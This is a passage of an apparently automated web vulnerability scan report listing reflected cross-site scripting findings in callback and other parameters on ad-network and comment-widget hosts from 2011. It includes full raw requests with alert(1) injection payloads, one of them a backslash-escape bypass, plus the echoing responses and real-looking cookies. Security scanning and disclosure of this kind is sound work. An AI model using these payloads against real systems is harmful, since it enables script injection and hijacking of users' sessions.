GET /bubble/?request_id=gannettf9e6d<img%20src%3da%20onerror%3dalert(1)>5f177f5c0b0&respond_path=LINGO.connect&try=1&format=ping&key=gannett&lm=1304974956000&url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&title=Monday%27s%20TV%20Talk%20Show%20Lineup%20%7C%20The%20Courier-Journal%20%7C%20courier-journal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
content-type: text/javascript
Date: Mon, 09 May 2011 16:04:31 GMT
Server: Google Frontend
Content-Length: 119

LINGO.connect.respond( {"status": "ok", "content": {}, "key": "gannettf9e6d<img src=a onerror=alert(1)>5f177f5c0b0"} );
2.72. http://lingows.appspot.com/bubble/ [respond_path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload ef298<script>alert(1)</script>ad47c31e778 was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bubble/?request_id=gannett&respond_path=LINGO.connectef298<script>alert(1)</script>ad47c31e778&try=1&format=ping&key=gannett&lm=1304974956000&url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&title=Monday%27s%20TV%20Talk%20Show%20Lineup%20%7C%20The%20Courier-Journal%20%7C%20courier-journal.com HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
content-type: text/javascript
Date: Mon, 09 May 2011 16:04:34 GMT
Server: Google Frontend
Content-Length: 116

LINGO.connectef298<script>alert(1)</script>ad47c31e778.respond( {"status": "ok", "content": {}, "key": "gannett"} );
2.73. http://odb.outbrain.com/utils/odb [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6ac5e<script>alert(1)</script>45d8609092f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.init6ac5e<script>alert(1)</script>45d8609092f&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304955483598; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 16:04:04 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJuovDP7yNbVX0w=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 16:04:04 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBplQhW0LT5kd7o="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 04:52:04 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 16:04:04 GMT; Path=/
Set-Cookie: recs="qo4bJGYTzGZe1ZsYUgv8jQOjWG3a6NRfoww4hfrpispWIsyhZ6XIsSSLUQtsXg4wvtGCrFMJwUc="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 16:09:04 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:03 GMT
Content-Length: 4074

GEL.thepage.pageinfo.outbrain.init6ac5e<script>alert(1)</script>45d8609092f({'response':{'exec_time':29,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204204935','req_id':'42e0176f46c656af057660e153efea1a'},'score':{'preferred':'average','personal':{'score'
...[SNIP]...
2.74. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 615ca'%3balert(1)//c117bcd8f02 was submitted in the admeld_callback parameter. This input was echoed as 615ca';alert(1)//c117bcd8f02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match615ca'%3balert(1)//c117bcd8f02 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; dps2b=; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw=="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1304955500+ \"4634997524033340755\"+ 4451+ 6017+ 2]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1304955428+ \"5056308203649640923\"+ 4451+ 6017+ 2]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuGYcpZVgFHizZQF71gUGDXO7F34jsWA0QLM55LhWAmUZZJYApV90gKRBfO5JDiufGYByj6dAJJl0GAAyoDZQH0XPjABZR6DZZg07mxeCtTHZHEHKvv9GzPQzv/P5oNN/X8cYiqYD5SdfQMk+xwq2z5/AVgWzOcS4bh3AOSiLRd+vYXYyWDBABR9BXbJs0U/UERXzAf5bXLfaRTRnfdB5s+avxYhCgC7o1vH"; io_freq_p1="eJzjEuZYEynAKPFmyoJ3LAaMFmCaS5zjaoQAk8QSEEeBQYMBKLEEKnE8UIBF4ukEhASYDZTYbQ3U8RguwWRxByqxwAUo8f/ZfLjEcxCbS5hjvStQYsuFX28hEgwWDEDBbaFA10zuO40iuNcFKDhr/lqEIAByuzer"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 16:03:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 16:03:23 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 536

document.write('<img width="0" height="0" src="http://tag.admeld.com/match615ca';alert(1)//c117bcd8f02?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305389023&custom_user_segments=%2C11265%2C49026%2C49027%2C8%2C50185%2C4625%2C45714%2C6551%2C48153%2C48156%2C4
...[SNIP]...
2.75. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64dae<script>alert(1)</script>1de30274018 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=948951&cmp=996492&plc=319082770&sid=761056&num=5&ver=2&dv_url=http%3A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&callback=__verify_callback_39063242380564dae<script>alert(1)</script>1de30274018 HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RJOffplIg_1080158746.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA&ei=ADMELD&wp_exchange=0.80&euid=YWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5&slotid=NDQ1NTgyNQ&fiu=MEZTWjhURzVYTQ&ciu=MFJKT2ZmcGxJZw&reqid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2Ix&ccw=SUFCWDMwIzAuMDQ5NzM2MTl8SUFCMTIjMC4xMTIxNTUxfElBQjE0IzAuMDQwODg3Ng&epid=QU02MTA&esid=QU0xNjM3&bp=801&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=&v=0&geo=VVN8VFh8NjIzfDc1MjA3&s=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2Ffeatures07%2F305090030%2Fmonday-s-tv-talk-show-lineup%3Fodyssey%3Dmod%257cnewswell%257ctext%257chome%257cs&refurl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 74

__verify_callback_39063242380564dae<script>alert(1)</script>1de30274018(2)
2.76. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpcb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.courier-journal.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload 517be<script>alert(1)</script>0aafd293039 was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110509.courier-journal.B2305090030.article.FEATURES07%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb517be<script>alert(1)</script>0aafd293039&jpctx=request_0 HTTP/1.1
Host: sitelife.courier-journal.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A13H%2Cplacementid%3A1273038%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273039/0/0/ADTECH%253Balias%253Dky-louisville.courier-journal.com/life/television/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D66339%253Bmisc%253D1304956996013%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305003797; indystarprod=R3316910632; bar-notdark=1

Response

HTTP/1.1 200 OK
Set-Cookie: indystarprod=R3316910632; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 16:04:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm207l3pluckcom
Set-Cookie: SiteLifeHost=l3vm207l3pluckcom; domain=courier-journal.com; path=/
Set-Cookie: anonId=91d2f37d-aa7f-4959-9178-7910d5256105; domain=courier-journal.com; expires=Tue, 08-May-2012 16:04:23 GMT; path=/
Date: Mon, 09 May 2011 16:04:22 GMT
Content-Length: 3062

PluckSDKjpcb517be<script>alert(1)</script>0aafd293039({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110509.courier-journal.B2
...[SNIP]...
2.77. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.courier-journal.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload d10a0<script>alert(1)</script>d403d598350 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110509.courier-journal.B2305090030.article.FEATURES07%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0d10a0<script>alert(1)</script>d403d598350 HTTP/1.1
Host: sitelife.courier-journal.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A13H%2Cplacementid%3A1273038%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273039/0/0/ADTECH%253Balias%253Dky-louisville.courier-journal.com/life/television/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D66339%253Bmisc%253D1304956996013%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305003797; indystarprod=R3316910632; bar-notdark=1

Response

HTTP/1.1 200 OK
Set-Cookie: indystarprod=R3316910632; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 16:04:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm207l3pluckcom
Set-Cookie: SiteLifeHost=l3vm207l3pluckcom; domain=courier-journal.com; path=/
Set-Cookie: anonId=af5da7d2-00d4-485f-af67-234ed442bba6; domain=courier-journal.com; expires=Tue, 08-May-2012 16:04:25 GMT; path=/
Date: Mon, 09 May 2011 16:04:24 GMT
Content-Length: 3062

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110509.couri
...[SNIP]...
al.ArticleResponse\",\r\n \"ResponseStatus\": {\r\n \"StatusCode\": \"OK\",\r\n \"Exceptions\": [],\r\n \"ObjectType\": \"Models.System.ResponseStatus\"\r\n }\r\n}"
}
]
},'request_0d10a0<script>alert(1)</script>d403d598350');
2.78. http://todayshow.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://todayshow.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d7ee%3balert(1)//3561661cc9e was submitted in the jscallback parameter. This input was echoed as 5d7ee;alert(1)//3561661cc9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ipid=10684&di=30370346,30370289,30370287,30370173&syid=0,0,0,0&adid=0,0,0,0&pid=2,2,2,2&cc=us&rcc=us&hk=1&ts=20110509160239&so=0&mh=2e0d94c556e85670a6e0a4603c9a1040&pvu=D5F2C53627D84E5F933CABE668888988&pvm=f10bcd0a04d4e06bea5c817385b3fae2&uf=0,0,0,0&ur=0,0,0,0&from=1002&jscallback=$iTXT.js.callback05d7ee%3balert(1)//3561661cc9e HTTP/1.1
Host: todayshow.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:03:40 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 09 May 2011 16:03:40 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback05d7ee;alert(1)//3561661cc9e();}catch(e){}
2.79. http://todayshow.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://todayshow.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 99724<script>alert(1)</script>91080e44cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10684&99724<script>alert(1)</script>91080e44cdd=1 HTTP/1.1
Host: todayshow.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9CgwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X9yzAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:03:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:10 GMT
Age: 0
Connection: keep-alive
Content-Length: 8128

/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ
...[SNIP]...
ad();}}};function itxtBegin(){
var itxturl='http://todayshow.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10684&99724<script>alert(1)</script>91080e44cdd=1';
itxturl+='&seid='+gSEID+'&sest='+gSEST;
if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl);
} else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() {
$iTXT.js.load(itxturl);
...[SNIP]...
2.80. http://todayshow.us.intellitxt.com/v3/door.jsp [sest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://todayshow.us.intellitxt.com
Path:   /v3/door.jsp

Issue detail

The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc566\'%3balert(1)//64a63b57b65 was submitted in the sest parameter. This input was echoed as dc566\\';alert(1)//64a63b57b65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /v3/door.jsp?ts=1304956957548&pagecl=14338&enc=utf-8&fv=102&muid=B506C07761D7465D924574124E3C14DF&ipid=10684&seid=0&sest=dc566\'%3balert(1)//64a63b57b65 HTTP/1.1
Host: todayshow.us.intellitxt.com
Proxy-Connection: keep-alive
